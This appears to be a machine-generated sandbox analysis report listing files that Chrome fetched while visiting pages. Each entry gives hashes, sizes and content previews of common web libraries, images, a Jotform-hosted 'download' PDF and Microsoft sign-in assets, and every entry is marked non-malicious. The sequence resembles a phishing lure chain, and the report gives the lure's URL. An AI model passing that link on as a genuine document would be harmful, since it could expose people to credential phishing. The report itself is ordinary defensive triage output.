                                                                                                                                                                                                                                            SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                                                            MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                                                            SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                                                            SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                                                            SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):61
                                                                                                                                                                                                                                            Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                                                                                                                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):369019
                                                                                                                                                                                                                                            Entropy (8bit):5.471884287546806
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:cHOUXP7AhVuhTDGfNXqh/IT3TSZWkcSO2dpmcsmhce5NuNWPllei+BJkWomDBT5D:afAhVuhTDGRk/W3TSZWkcSO2dpmFmhcp
                                                                                                                                                                                                                                            MD5:D458B68730A7330653700489333A7837
                                                                                                                                                                                                                                            SHA1:4059AECA1D0B99AEC8006B37A927F09D9C0E794D
                                                                                                                                                                                                                                            SHA-256:430725B95468277DCBCCC27E08E3D873276C0082737310B0B1AD330392511847
                                                                                                                                                                                                                                            SHA-512:E363C4D2B77EC19DA13577ED94CEFC0527A1206CDECCD790BB38A18810AF504077095C47BEC4A117CEB0056C1039137134836504FBAAEEB1B859684D89354716
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:!function(e,a){"object"==typeof exports&&"undefined"!=typeof module?module.exports=a():"function"==typeof define&&define.amd?define(a):e.moment=a()}(this,function(){"use strict";var E;function M(){return E.apply(null,arguments)}function F(e){return e instanceof Array||"[object Array]"===Object.prototype.toString.call(e)}function z(e){return null!=e&&"[object Object]"===Object.prototype.toString.call(e)}function l(e,a){return Object.prototype.hasOwnProperty.call(e,a)}function N(e){if(Object.getOwnPropertyNames)return 0===Object.getOwnPropertyNames(e).length;for(var a in e)if(l(e,a))return;return 1}function d(e){return void 0===e}function J(e){return"number"==typeof e||"[object Number]"===Object.prototype.toString.call(e)}function R(e){return e instanceof Date||"[object Date]"===Object.prototype.toString.call(e)}function C(e,a){for(var t=[],s=e.length,n=0;n<s;++n)t.push(a(e[n],n));return t}function I(e,a){for(var t in a)l(a,t)&&(e[t]=a[t]);return l(a,"toString")&&(e.toString=a.toString),
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 144 x 144, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):934
                                                                                                                                                                                                                                            Entropy (8bit):7.503764964979933
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:OAKiHZ33W0XrzLdu6m5hRR+PFVIqngrKfAGrvPG8bn1/07kPBcSTr3ehWHJ:mmjdu6mdR+X/ngrKfjG8pCmXusp
                                                                                                                                                                                                                                            MD5:88BCF8B9693D101ED0F51D5FCBED4690
                                                                                                                                                                                                                                            SHA1:53A2221A74D176C20D6EF19FFB221880733331CB
                                                                                                                                                                                                                                            SHA-256:F4AC53890B1FC6B17DBF9495C150F606461549C1B130FD7D27198A790B09134F
                                                                                                                                                                                                                                            SHA-512:83295B3705AA56EEDEC1B871AB485855C387958BC65AA59180DAB3CD3380854236F11674F57D124CCE92A4AACF7394EF81596A94E45AF85705EEA74BD2F934B5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:.PNG........IHDR....................PLTE....a......)..Q.......u ..............y)2g..Q................@...~0...... ...._..`..@..7......D.k.`............p...P.........p...................OW..#\..P......0..........em....9Ar..l:.}.....IDATx...n.@........q..z...zy..:....2.h.D....4.{waY.eY.eY.e....."....*.........mt.c.!../>8.y....z.&..y....#...%xr...z(...<T.......}^.@I{...*t..:D....fEP....*..DYzZ....{.Q...d..4....3J.P..=.0....O.=T.....y<O....y..2..R.)).x+e..2O.`.aOC.'l..`...*..H..ee.h.@..-e.,.y.T._.....<.[.<.IY..H.g.J..G.....p.....7...'.Z<...=Se..P....'.........5<.....z.:....T.....T<.S..."u..JfF...........h..P=...0=.[..=.9....PUH.s=T....,.<.7.4...]..&....^..y..|r..#.V.O.....xK..K..a..........9..D.......8...X.....y..".K....qDuy..G...qD5y..CT.......x... ...C.d..c...x.8.....#..{.8.@......=xJ.]._...n...qO.....H.........P.J..=..;u.=.H&..R.}....g[-...q..eY.eY.eY.A..dUC.A.......IEND.B`.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PDF document, version 1.3, 1 pages
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):146238
                                                                                                                                                                                                                                            Entropy (8bit):7.95809560989995
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:H8tCig7NFh9nu/eMAvAq5K37BRV5aJMIsk4y+VS1/lS/b2WNxy/NG6dXHnE:H8tbCNFhFAq5KrTrLI1b6m9S/b2WN0/o
                                                                                                                                                                                                                                            MD5:101970D9D8BCD64F29FC00572E3C1DF3
                                                                                                                                                                                                                                            SHA1:9CFD771CA6FFCF8BC5A04524BE37A227DD5CB3A2
                                                                                                                                                                                                                                            SHA-256:1C337234A0FBF9A0B6DD3D0BCD7C714A1B7D8D48C5EBD030569EA11303A7C91A
                                                                                                                                                                                                                                            SHA-512:66DF4E307BB7B7355AC8C81D9E57F65EFB4589A62936081DEF32501650584D62CD0F04818503A2A0708F8EA986D78000C632D2A3082E611D3FCE0E15B8CFBE56
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:%PDF-1.3.%..........3 0 obj.<< /Filter /FlateDecode /Length 3219 >>.stream.x..ZY..9.~._!{.z.....n...<..........1.`{..|yI...c ..NU..T*.L.'.....}..._..._>.)...{r9..#....9.G.^.w.._...2t.....%.a....zZ>.."P.C\...Q.=H..=....G....'...~.}rSv.sip~q.?......M.}..P9a/.1.....`...,yg....p.O...C.2.._........_.KS.a...u.'..p.`..;w.b..?.?. ...6..c..../.. I..khr..O.X......n.....<..#...{.M@..n\.^...|...~.....>.$..#MS....A7..I..W........+<....<..u.s.?../.K.....P..=....`...v.^.3..3. r....J.^.....#.:..-...&h.S?-...3..v8wp.?..}.|...7q.r|Y.>....s+..H.....+Z1....L..1......... .Va...>.S..0..W..A...t}....G...'.2x.w..k..w.<.3.....~..Qu{..&E..I..9. .z.z.s...#...&-.wE...o2....... ....qtb9.J....M.aC. .78.....)'Q...=+..r..O^r......GT8.h.3...ls.8.J...F..H.n).....^<...r.n...].............Fh(..q...7y.9d&.c?Q.8=!.2HA..H]b..!WQ...k.......B..h3y.....W.O1Q..m5.o.M.QV...M.?...X...(lR>p-#...`.4.9.... .8/.e...W...O..o9x+..Lr.Jr...L.[.6.]..O.....)M..2.$\.e.t..-....~...0..48..B.6.@H.h...H
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (15296)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3551601
                                                                                                                                                                                                                                            Entropy (8bit):5.683980405460708
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:6bdZzWis0XrDcJVlg4bUTCXAbmIWOdr6kq4vXyOv164ax2VF:wzKOp62
                                                                                                                                                                                                                                            MD5:CFBD9668B652A0B7EF999724288BF504
                                                                                                                                                                                                                                            SHA1:4615829A04D21D15D156793542CC37A1F06C71FE
                                                                                                                                                                                                                                            SHA-256:7E169E65B2E22988F9388F368D2DE1DF504A5BFA1FBC9FC055897AB24AD7C6A7
                                                                                                                                                                                                                                            SHA-512:1ED6CD79BD974C112835BFAB215CF0BA8089DC079573A3E5573278194C11FA76638E3B7539E3F190C91D33C6158052665DC07374A6EBE6E175B72B41EF762695
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e356b656-d5b7-50c1-bc53-6b1559b159dc")}catch(e){}}();.(function(){var __webpack_modules__={88214:function(){},54354:function(){},58501:function(e,t,n){"use strict";n.d(t,{Z:function(){return g}});var o=n("94653"),a=n("37897"),r=n("11268"),i=n("27219"),l=n("60518"),s=n("99216"),c=n("42695"),d=n("11759"),u=n("65964");var p=d.ZP.div`. ${u.z}. border-radius: 10px;. ${({isSVG:e,bgColor:t})=>e?`background: ${t};`:""}. margin-bottom: 5px;.. .jfIconSVG-wrapper {. display: flex;. }.`,m=n("96757"),h=n("45050");const f=({withBorder:e})=>{const{appIconType:t,appIconBackground:n,appIconColor:a,appIconSvgRef:r,appIconURL:d,installableIconURL:u}=(0,i.v9)(h.Z.getAppIconProperties),f=(0,i.v9)(h.Z.getAppTitle),g=(0,i.v9)(h.Z.getAppVersionSelector),y=(0,i.v9)(h.Z.getLogoProperties),v=p,C
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (29635)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):30019
                                                                                                                                                                                                                                            Entropy (8bit):5.490823569534409
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:0GyhAzmqbPD9bLG3BqOC0sWHZ+eqNhLMAxLQrDsj:dgqOpHK8G
                                                                                                                                                                                                                                            MD5:47729A5B4D98F8419DCE0E722EFBA3CB
                                                                                                                                                                                                                                            SHA1:9196E6B54647DC2AA1A7CEFCE0792A064ECDB42C
                                                                                                                                                                                                                                            SHA-256:6E0F98362FF7025A15CC70BE746EAF288E24605ED18457F5DB353DAFBC002837
                                                                                                                                                                                                                                            SHA-512:C88F1C9EAFE8C4ED35E0238DB68B283F822BAD7AC1850CC16CC214FD033A75C9F8660AB53939CFCE2C7BF51FCDF66C147CD456AF8A8CFBD3E29A9E165613880B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn03.jotfor.ms/s/portal/674ac14411e/static/js/DocumentPreview.af8c5c66.js
                                                                                                                                                                                                                                            Preview:"use strict";.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ab166835-5ee3-50e2-9332-508e88711b24")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["6532"],{3863:function(e,i,n){n.r(i),n.d(i,{default:function(){return _e}});var t={};n.r(t),n.d(t,{Audio:function(){return ee},Image:function(){return Z},PDF:function(){return he},Tiff:function(){return $},Unsupported:function(){return Y},Video:function(){return ne}});var o,s=n("94653"),r=n("37897"),l=n("41663"),a=n("80557"),d=n("32358"),p=n("30234"),c=n("11268"),u=n.n(c),h=n("96724"),m=n.n(h),f=n("40991"),w=n("91715"),g=n("9729"),v=n("68664"),x=n("57665"),C=n("26925"),b=n("62606"),j=n("88412"),y=n("472"),U=n.n(y);function N(){return N=Object.assign?Object.assign.bind():function(e){for(var i=1;i<arguments.l
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):89501
                                                                                                                                                                                                                                            Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 89 x 96, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):61
                                                                                                                                                                                                                                            Entropy (8bit):3.949386794740199
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:yionv//thPlU3lU5bHxl/k4E08up:6v/lhPie5bH7Tp
                                                                                                                                                                                                                                            MD5:AB1E375E29163851FBE05D1482DEF406
                                                                                                                                                                                                                                            SHA1:67398EF5FC9022802F127AE12BA0B494B2F81479
                                                                                                                                                                                                                                            SHA-256:D7FF860BB4EDEAA96D50F127F9D3023635B8959A2992A3740F2999194FC63346
                                                                                                                                                                                                                                            SHA-512:FFDA9ED851117EE98C4D770698C88C51A045A34C609B2C172FDFA2875092C77932C1E97CB53734941E249DAA255A693449E2E4D0787E8BA1DA2116ADC322B880
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:.PNG........IHDR...Y...`.......I.....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PDF document, version 1.3, 1 pages
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):146238
                                                                                                                                                                                                                                            Entropy (8bit):7.95809560989995
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:H8tCig7NFh9nu/eMAvAq5K37BRV5aJMIsk4y+VS1/lS/b2WNxy/NG6dXHnE:H8tbCNFhFAq5KrTrLI1b6m9S/b2WN0/o
                                                                                                                                                                                                                                            MD5:101970D9D8BCD64F29FC00572E3C1DF3
                                                                                                                                                                                                                                            SHA1:9CFD771CA6FFCF8BC5A04524BE37A227DD5CB3A2
                                                                                                                                                                                                                                            SHA-256:1C337234A0FBF9A0B6DD3D0BCD7C714A1B7D8D48C5EBD030569EA11303A7C91A
                                                                                                                                                                                                                                            SHA-512:66DF4E307BB7B7355AC8C81D9E57F65EFB4589A62936081DEF32501650584D62CD0F04818503A2A0708F8EA986D78000C632D2A3082E611D3FCE0E15B8CFBE56
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://eu-files.jotform.com/jufs/Gittens_Murray/form_files/DOWNLOAD%20GITTENS%20MURRAYS%20ARCHITECTS.678101120618b4.41192529.pdf?md5=ufTBvV4o_hZ61vxTbutwig&expires=1736510740
                                                                                                                                                                                                                                            Preview:%PDF-1.3.%..........3 0 obj.<< /Filter /FlateDecode /Length 3219 >>.stream.x..ZY..9.~._!{.z.....n...<..........1.`{..|yI...c ..NU..T*.L.'.....}..._..._>.)...{r9..#....9.G.^.w.._...2t.....%.a....zZ>.."P.C\...Q.=H..=....G....'...~.}rSv.sip~q.?......M.}..P9a/.1.....`...,yg....p.O...C.2.._........_.KS.a...u.'..p.`..;w.b..?.?. ...6..c..../.. I..khr..O.X......n.....<..#...{.M@..n\.^...|...~.....>.$..#MS....A7..I..W........+<....<..u.s.?../.K.....P..=....`...v.^.3..3. r....J.^.....#.:..-...&h.S?-...3..v8wp.?..}.|...7q.r|Y.>....s+..H.....+Z1....L..1......... .Va...>.S..0..W..A...t}....G...'.2x.w..k..w.<.3.....~..Qu{..&E..I..9. .z.z.s...#...&-.wE...o2....... ....qtb9.J....M.aC. .78.....)'Q...=+..r..O^r......GT8.h.3...ls.8.J...F..H.n).....^<...r.n...].............Fh(..q...7y.9d&.c?Q.8=!.2HA..H]b..!WQ...k.......B..h3y.....W.O1Q..m5.o.M.QV...M.?...X...(lR>p-#...`.4.9.... .8/.e...W...O..o9x+..Lr.Jr...L.[.6.]..O.....)M..2.$\.e.t..-....~...0..48..B.6.@H.h...H
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 90677
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):32811
                                                                                                                                                                                                                                            Entropy (8bit):7.992877953733209
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:768:fDPYSdMWwCyzH8REcKPN/8p0x7UQzlRMXv1FevViDAqA:a8REcsUp0xUQzc/8VCAV
                                                                                                                                                                                                                                            MD5:2E287EB418940084B921590C6E672C9E
                                                                                                                                                                                                                                            SHA1:1FC75A9DAA054EF88AAEA181F3A9B4CBA2B6B6E1
                                                                                                                                                                                                                                            SHA-256:6C2C58DAAE76131A00D1BFEE20852F372CF594BE7F4A8848ACC42F8BF72C1BBD
                                                                                                                                                                                                                                            SHA-512:A77F69571B0F04F4A2354D9E18E41EF86F22274EAED20C02215B632BFEF09C6543A83591E9DB3F2B4036A9684BFF666EB6A7B253BA18893500E9CD541AB752A0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://logincdn.msauth.net/shared/5/chunks/oneds-analytics-js_077217740c853b5d4fe8.js
                                                                                                                                                                                                                                            Preview:...........iw.8.?.~>....%."9K'R...q:.fw.,.n_.Z.l.eRMR^b.O...A.N...yq.t,b!.....BU....4kM.Lr..I.]DE.&..TF..K.J.9.7.$....(..'?....f...tG...?y8~0..;..w;[....;.u........D.......N:W.d........E..eR...q..sJG.O.Z,....l......~.........'.d.......n.N..@.../....l'...".J3Y..n3Y...o..T...P0..j..-.....v.m7T.LM. .....Ev.7...IC.q..[.t>nj.e..OE<m...l)^.K.......8:M.&.]zz*..j.X..K........'3..Tk....Z.2.GQ6..Fi._.|v.Bf.W?...T.]:j(.%F.)..t_^........8.:..DN..8....B.>|<..~..|H.x.q.=-.f.~..{.z..&t...e.LfE,.;.d...n.....2..FH. .Y,.J...EC.cj. .F......o.....\...&\.J..fJiJ.S..4.5..NM]m.....Q.....e.O..iSs'........'Z..6A(Y.8..eQ.....2..I.?...;dS..I...D..@./7t.:z.......c...dF..B.......9...8)..h.........<.I...2.\FY+.=S.8...$Qv...<..IL.x".w9_..3.."-nfR.(..WDN..L.....z..I8.E..Ub......d..M.....sq.N........p.*.lX...A]3Y....j...%.`N..G.v..6.m.KH.M......Z..a2.N.....4....,u.O.vWM...=d..J.r`..b.....N.hzp..C..?.. ......:..M6............;.w.."B.^.ZP.N.:.[..(:...(.y.)q...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):621
                                                                                                                                                                                                                                            Entropy (8bit):7.673946009263606
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                                                                                                                                                                            MD5:4761405717E938D7E7400BB15715DB1E
                                                                                                                                                                                                                                            SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                                                                                                                                                                            SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                                                                                                                                                                            SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                                                                                                                                                                                                            Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (8371), with no line terminators
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):8371
                                                                                                                                                                                                                                            Entropy (8bit):5.047863494963382
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:GzZVoi1YrACv8S5cspmuMcC1YFJzJQf97+bTUwYp13Mld729P0pu70jwIs:UZ9CrACUS5XpxC1YZf72N0puf
                                                                                                                                                                                                                                            MD5:7635C910C0C8342B483BDBA314E4D50D
                                                                                                                                                                                                                                            SHA1:4AC8DB2DDD4792F72B4891C5BC07D5A511232BB6
                                                                                                                                                                                                                                            SHA-256:59F5590F1BD2E53145FF6CAFD7F6D07A04BBC6CB6B0E31B274A615EE7A73FFA1
                                                                                                                                                                                                                                            SHA-512:56F3E9325AC0CAFA635531637843F336CCC338E855AFE7E8643875CAC4ADF1CA2E6C6990319510DCE5DA2E2046D745179188E7FF688156D69AD5714C41E3CBB1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn.jotfor.ms/stylebuilder/static/donationBox.css?v=3ff9d3e
                                                                                                                                                                                                                                            Preview:.donationBoxV2{width:100%}.donationBoxV2 .ScProgressBar{display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;font-size:14px;width:100%;height:17px;border-radius:149px;border:1px solid var(--ScProgressBarBorderColor);background-color:var(--ScProgressBarTotalBarBg)}.donationBoxV2 .ScProgressBar span{color:#3e437a;font-size:14px;height:13px;border-radius:149px;margin-left:2px;width:var(--ScProgressBarSpanreducedPercentage);background-color:var(--ScProgressBarSpanBackgroundColor)}.donationBoxV2 .ScDonationMeter{margin-top:12px;margin-bottom:36px}.donationBoxV2 .ScDonationMeter .ScDonationMeterTexts{display:-ms-flexbox;display:flex;font-size:16px;margin-bottom:10px;color:var(--ScDonationMeterTextsColor)}.donationBoxV2 .ScDonationMeter .ScDonationMeterTexts .ScGoal{font-weight:500;margin-left:.3rem}.donationBoxV2 .ScCustomInputContainer{border:1px solid transparent;border-color:var(--ScCustomInputContainerBorderColor);border-radius:4px;display:-ms-flexbox;display:flex;-m
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):369019
                                                                                                                                                                                                                                            Entropy (8bit):5.471884287546806
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:cHOUXP7AhVuhTDGfNXqh/IT3TSZWkcSO2dpmcsmhce5NuNWPllei+BJkWomDBT5D:afAhVuhTDGRk/W3TSZWkcSO2dpmFmhcp
                                                                                                                                                                                                                                            MD5:D458B68730A7330653700489333A7837
                                                                                                                                                                                                                                            SHA1:4059AECA1D0B99AEC8006B37A927F09D9C0E794D
                                                                                                                                                                                                                                            SHA-256:430725B95468277DCBCCC27E08E3D873276C0082737310B0B1AD330392511847
                                                                                                                                                                                                                                            SHA-512:E363C4D2B77EC19DA13577ED94CEFC0527A1206CDECCD790BB38A18810AF504077095C47BEC4A117CEB0056C1039137134836504FBAAEEB1B859684D89354716
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn01.jotfor.ms/s/vendor/static/moment/2.29.4/moment-with-locales.min.js
                                                                                                                                                                                                                                            Preview:!function(e,a){"object"==typeof exports&&"undefined"!=typeof module?module.exports=a():"function"==typeof define&&define.amd?define(a):e.moment=a()}(this,function(){"use strict";var E;function M(){return E.apply(null,arguments)}function F(e){return e instanceof Array||"[object Array]"===Object.prototype.toString.call(e)}function z(e){return null!=e&&"[object Object]"===Object.prototype.toString.call(e)}function l(e,a){return Object.prototype.hasOwnProperty.call(e,a)}function N(e){if(Object.getOwnPropertyNames)return 0===Object.getOwnPropertyNames(e).length;for(var a in e)if(l(e,a))return;return 1}function d(e){return void 0===e}function J(e){return"number"==typeof e||"[object Number]"===Object.prototype.toString.call(e)}function R(e){return e instanceof Date||"[object Date]"===Object.prototype.toString.call(e)}function C(e,a){for(var t=[],s=e.length,n=0;n<s;++n)t.push(a(e[n],n));return t}function I(e,a){for(var t in a)l(a,t)&&(e[t]=a[t]);return l(a,"toString")&&(e.toString=a.toString),
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (11971)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):11972
